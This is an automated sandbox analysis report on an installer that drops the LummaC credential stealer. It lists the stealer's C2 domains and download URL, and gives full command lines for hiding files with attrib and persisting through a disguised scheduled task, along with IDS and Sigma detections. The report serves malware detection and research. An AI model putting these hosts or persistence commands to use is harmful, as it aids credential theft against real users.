Edit tour

Windows Analysis Report
Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Overview

General Information

Sample name:	Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Analysis ID:	1632503
MD5:	4f4e6dd4d4b9d96e69b7f8f97e867023
SHA1:	51db1de1d11976911dee96ed18b1fc903ea16676
SHA256:	43b9bb932501d8d186d9fd49ee5fa1a1c47283e1db898a68b5c846eb7b971aee
Tags:	exeNOBISLLCuser-SquiblydooBlog
Infos:

Detection

LummaC Stealer

Score:	64
Range:	0 - 100
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Drops password protected ZIP file

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses attrib.exe to hide files

Uses schtasks.exe or at.exe to add and modify task schedules

Connects to a URL shortener service

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

EXE planting / hijacking vulnerabilities found

Enables security privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Magic_V_pro_setup_stable_latest_release_version_9_709.exe (PID: 2500 cmdline: "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" MD5: 4F4E6DD4D4B9D96E69B7F8F97E867023)

Magic_V_pro_setup_stable_latest_release_version_9_709.tmp (PID: 1408 cmdline: "C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" MD5: 6C66FDD38C098F271FDE6E9E74DBD0EB)

Magic_V_pro_setup_stable_latest_release_version_9_709.exe (PID: 4260 cmdline: "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp- MD5: 4F4E6DD4D4B9D96E69B7F8F97E867023)

Magic_V_pro_setup_stable_latest_release_version_9_709.tmp (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp- MD5: 6C66FDD38C098F271FDE6E9E74DBD0EB)

idp.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8 MD5: 6482EE0F372469D1190C74BD70D76153)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7656 cmdline: "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7708 cmdline: attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

schtasks.exe (PID: 7724 cmdline: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7796 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskshostw.exe (PID: 7772 cmdline: C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe MD5: 33645B3AFD79ED29F7E6F476D7F6ED4B)

taskshostw.exe (PID: 8128 cmdline: C:\Users\user\AppData\Local\programs\common\taskshostw.exe MD5: 33645B3AFD79ED29F7E6F476D7F6ED4B)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["willpowerwav.site", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "ROmgOO--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
17.3.taskshostw.exe.2990000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.taskshostw.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.3.taskshostw.exe.2990000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 6800, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 7724, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 6800, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 7724, ProcessName: schtasks.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T03:14:26.697100+0100	2028371	3	Unknown Traffic	192.168.2.4	49717	104.18.111.161	443	TCP
2025-03-08T03:14:29.297286+0100	2028371	3	Unknown Traffic	192.168.2.4	49719	164.132.58.105	443	TCP
2025-03-08T03:14:49.607822+0100	2028371	3	Unknown Traffic	192.168.2.4	49727	172.67.194.165	443	TCP
2025-03-08T03:14:51.824281+0100	2028371	3	Unknown Traffic	192.168.2.4	49728	172.67.194.165	443	TCP
2025-03-08T03:15:41.810908+0100	2028371	3	Unknown Traffic	192.168.2.4	49729	172.67.194.165	443	TCP
2025-03-08T03:15:44.107187+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	172.67.194.165	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T03:14:50.090104+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49727	172.67.194.165	443	TCP
2025-03-08T03:15:42.293386+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49729	172.67.194.165	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T03:14:50.090104+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49727	172.67.194.165	443	TCP
2025-03-08T03:15:42.293386+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49729	172.67.194.165	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://rea.grupolalegion.ec/R	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipU	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zip	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipq	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/api	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipWW	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/Y	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/apiF	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site:443/api	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/apix	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/:	Avira URL Cloud: Label: malware
Source: willpowerwav.site	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Avira: detection malicious, Label: TR/AVI.Lumma.jtxjg

Found malware configuration

Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["willpowerwav.site", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "ROmgOO--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

ReversingLabs: Detection: 66%

Sample uses string decryption to hide its real strings

Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: willpowerwav.site
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: uncertainyelemz.bet
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: hobbyedsmoker.live
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: presentymusse.world
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: deaddereaste.today
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: subawhipnator.life
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: privileggoe.live
Source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp	String decryptor: boltetuurked.digital

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

EXE: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

EXE: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Jump to behavior

Uses 32bit PE files

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

PE / OLE file has a valid certificate

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49729 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FF6CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,

10_2_00FF6CE2

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FF7904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

10_2_00FF7904

Software Vulnerabilities

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000BBh]	17_2_00447A90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	17_2_00444C00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi]	17_2_00446040
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then push dword ptr [esi+14h]	17_2_0041083A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_0041083A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx-000000D2h]	17_2_0042F8C9
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_004298F0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	17_2_0044108A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	17_2_004400A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	17_2_004400A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	17_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2809052Bh]	17_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi+27577599h]	17_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_0041D12C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	17_2_0041D12C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	17_2_0040A1A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov word ptr [eax], cx	17_2_004201AB
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	17_2_004469B0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+140AC537h]	17_2_00445A52
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov eax, ebx	17_2_00421260
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [eax], cl	17_2_0041C221
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	17_2_0041C221
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+38h]	17_2_0042D23F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_004232C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	17_2_0043CAD0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov dword ptr [esp+08h], edi	17_2_00433ADD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_0042C2E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	17_2_00446AE0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+578BD47Eh]	17_2_0040FAFA
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+02h]	17_2_00440A80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	17_2_00440A80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_0040EB00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	17_2_00426380
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	17_2_0041ABA1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_0041ABA1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_00429BA0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-72CBAB97h]	17_2_0041FBB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov edx, ecx	17_2_0042C3BD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_0042C3BD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ebx, ecx	17_2_00444C40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	17_2_00444C40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then push esi	17_2_00425453
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov word ptr [esi], cx	17_2_00424C60
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [ecx], bl	17_2_0043347A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov eax, edx	17_2_00423400
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov word ptr [ecx], dx	17_2_00447CB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_00429D50
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	17_2_00445553
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-2809055Fh]	17_2_00411D78
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then jmp dword ptr [0044EA9Ch]	17_2_0042E534
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+078CCBDEh]	17_2_004475C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+27h]	17_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	17_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+27h]	17_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	17_2_004025A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+esi+0Ch]	17_2_0043F640
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_0043F640
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	17_2_00411E6A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-7Dh]	17_2_00411605
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+27DDFCF1h]	17_2_0042BE06
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	17_2_00418E80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+06h]	17_2_004206A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	17_2_0041A757
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_2_00402770
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], CA198B66h	17_2_0042BF10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	17_2_0042FF10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000000ECh]	17_2_0042B7C8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [edi], al	17_2_00433FCE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]	17_2_00433FCE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+ecx-70AAEE47h]	17_2_00411FF7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [edi], al	17_2_00433FCC
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]	17_2_00433FCC
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	17_2_0040A7A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49729 -> 172.67.194.165:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49727 -> 172.67.194.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49729 -> 172.67.194.165:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49727 -> 172.67.194.165:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: willpowerwav.site
Source: Malware configuration extractor	URLs: uncertainyelemz.bet
Source: Malware configuration extractor	URLs: hobbyedsmoker.live
Source: Malware configuration extractor	URLs: presentymusse.world
Source: Malware configuration extractor	URLs: deaddereaste.today
Source: Malware configuration extractor	URLs: subawhipnator.life
Source: Malware configuration extractor	URLs: privileggoe.live
Source: Malware configuration extractor	URLs: boltetuurked.digital

Connects to a URL shortener service

Source: unknown	DNS query: name: tinyurl.com
Source: unknown	DNS query: name: tinyurl.com

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 164.132.58.105 164.132.58.105
Source: Joe Sandbox View	IP Address: 190.92.154.206 190.92.154.206
Source: Joe Sandbox View	IP Address: 104.18.111.161 104.18.111.161
Source: Joe Sandbox View	IP Address: 104.18.111.161 104.18.111.161

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 164.132.58.105:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.18.111.161:443
